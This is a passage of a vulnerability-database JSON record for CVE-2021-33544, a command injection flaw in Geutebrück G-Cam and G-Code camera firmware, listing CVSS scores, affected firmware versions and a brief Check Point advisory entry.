"NONE"}, "impactScore": 5.9}, "published": "2021-09-13T18:15:00", "type": "cve", "title": "CVE-2021-33544", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33544"], "modified": "2022-12-07T02:51:00", "cpe": ["cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2"], "id": "CVE-2021-33544", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33544", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:32:57", "description": "A command injection vulnerability exists in UDP Technology IP Camera. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-24T00:00:00", "type": "checkpoint_advisories", "title": "UDP Technology IP Camera Command Injection (CVE-2021-33544)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33544"], "modified": "2021-09-24T00:00:00", "id": "CPAI-2021-0709", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}

Geutebrück G-Cam E2 and G-Code

Description

Related